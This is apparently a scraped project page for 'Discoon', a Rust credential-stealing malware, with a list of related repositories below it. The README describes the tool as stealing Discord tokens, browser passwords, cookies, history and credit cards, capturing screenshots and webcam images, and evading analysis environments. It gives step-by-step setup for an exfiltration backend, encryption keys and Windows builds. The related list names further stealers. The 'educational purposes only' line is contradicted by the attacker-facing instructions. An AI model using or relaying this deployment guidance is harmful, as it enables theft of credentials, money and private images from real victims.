Stealer with webhook protection

Overview

Discoon

Stealer with webhook protection

Educational purposes only

Only use this on your own machine and do not use it maliciously.

License

This project is licensed under the terms of the MIT license.

How it works

This is a malware written in Rust that steals the information the attacker chooses to steal and sends that through a server to the attacker's webhook.

Features

  • Grab IP Address (backend grabs the IP address)
  • Anti analysis (detects some malware analysis environments)
  • Webhook protection (sends to webhook through a backend making your webhook protected)
  • Trace token (sends new user token when they change user data also steals credit cards and login information)
  • Steal discord tokens (steal and decrypt discord tokens)
  • Steal browser passwords (steals browser passwords)
  • Steal browser cookies (steals browser cookies)
  • Steal browsing history (steals browsing history)
  • Steal credit cards (steals browser credit cards)
  • Take screenshot (takes a screenshot)
  • Take webcam image (takes a webcam image)

How to use

  1. Open it in VS Code or your preferred IDE
  2. Goto constants.rs and find the WEBHOOK field
  3. Set the webhook to your webhook
  4. Get a webhost you can get a free one from here
  5. Get the assets/upload.php and upload it to your webhost
  6. Change the BACKEND in src/constants.rs to yours
  7. Get a 256-bit key and a 128-bit iv from here
  8. Convert both of them to base64 here
  9. Set the key_bytes and iv_bytes to those values in encryption-macro/src/lib.rs
  10. Set the $key and $iv to those values in upload.php on your webhost
  11. Set the options you want in constants.rs
  12. Run (x64) cargo build --release or (x86) cargo build --release --target=i686-pc-windows-msvc

Contributing

  1. Fork it
  2. Create your branch (git checkout -b my-change)
  3. Commit your changes (git commit -am 'changed something')
  4. Push to the branch (git push origin my-change)
  5. Create new pull request
You might also like...
Proxies all incoming connections to a minecraft server of your choosing, while also logging all ping and login requests to a json file and discord webhook.

minecraft-honeypot Proxies all incoming connections to a minecraft server of your choosing, while also logging all ping and login requests to a json f

Plex webhook service to automatically update your Anilist watching list.

anifunnel Plex webhook service to automatically update your Anilist watching list. Description anifunnel is a web server that will consume incoming Pl

A Github webhook server to help with CI/CD written in Rust.
A Github webhook server to help with CI/CD written in Rust.

This application will automatically updates local GitHub repositories and triggers a command once the update is complete. This can be extremely useful

A simple hypervisor demonstrating the use of the Intel VT-rp (redirect protection) technology.

Hello-VT-rp A simple hypervisor demonstrating the use of the Intel VT-rp (redirect protection) technology. This repository is a complement of the blob

Executable memory allocator with support for dual mapping and W^X protection

jit-allocator A simple memory allocator for executable code. Use JitAllocator type to allocate/release memory and virtual_memory module functions to e

Reverse engineering Vercel's bot protection

vercel-anti-bot Reverse engineering and analysis of Vercel's bot protection used on https://sdk.vercel.ai (and potentially more of their platforms). U

 Lambda function to handle Bitbucket webhook payloads, extract relevant information and send notifications to Microsoft Teams
Lambda function to handle Bitbucket webhook payloads, extract relevant information and send notifications to Microsoft Teams

PR-Bot Lambda function to handle Bitbucket webhook payloads, extract relevant information, and send notifications to Microsoft Teams, saving you time

Owner
RadonCoding
I'm a developer focused on cybersecurity.
RadonCoding
Simple Data Stealer

helfsteal Simple Data Stealer Hi All, I published basic data stealer malware with Rust. FOR EDUCATIONAL PURPOSES. You can use it for Red Team operatio

Ahmet Güler 7 Jul 7, 2022
Easy to use cryptographic framework for data protection: secure messaging with forward secrecy and secure data storage. Has unified APIs across 14 platforms.

Themis provides strong, usable cryptography for busy people General purpose cryptographic library for storage and messaging for iOS (Swift, Obj-C), An

Cossack Labs 1.6k Dec 30, 2022
A Rust application which funnels external webhook event data to an Urbit chat.

Urbit Webhook Funnel This is a simple Rust application which funnels external webhook event data to an Urbit chat. This application is intended to be

Robert Kornacki 15 Jan 2, 2022
Steals browser passwords and cookies and sends to webhook.

Browser-Stealer Steals browser passwords and cookies and sends to webhook. Donating Educational Purposes Only This code is made so you can learn from

RadonCoding 3 Sep 27, 2021
IITC-CE Telegram Chat Spam Protection

ADA AntiBot This bot bans spammers in Telegram chat. Run To run you should export environment variables: TELOXIDE_TOKEN - telegram bot token TELEGRAM_

Ingress Intel Total Conversion — Community Edition 4 May 23, 2022
A webhook-based Discord slash command library

Slashook A webhook-based Discord slash command library. This is a WIP project. Please note breaking changes can occur within minor releases until vers

Tonkku 11 Oct 18, 2022
A rust wrapper for the spam protection API

SpamProtection-rs Table of contents About Supported Rust version Features How to use Credits License About This repo has been shifted to the official

cyberknight777 28 Aug 5, 2022
Adds zero-cost stack overflow protection to your embedded programs

flip-link adds zero-cost stack overflow protection to your embedded programs The problem Bare metal Rust programs may not be memory safe in presence o

Knurling 151 Dec 29, 2022
🥅 Dead simple webhook worker for Sentry to output events in a Discord channel

?? Sentry Webhook Dead simple webhook worker for Sentry to output events in a Discord channel Why? This is just a simple Rust HTTP service to do so, t

Noel 5 Nov 7, 2022
Interesting protection concept i came up with.

Note If this reprository is useful to you in in any shape or form please give it a star. How it works This protection works by taking all the assembly

RadonCoding 10 Dec 20, 2022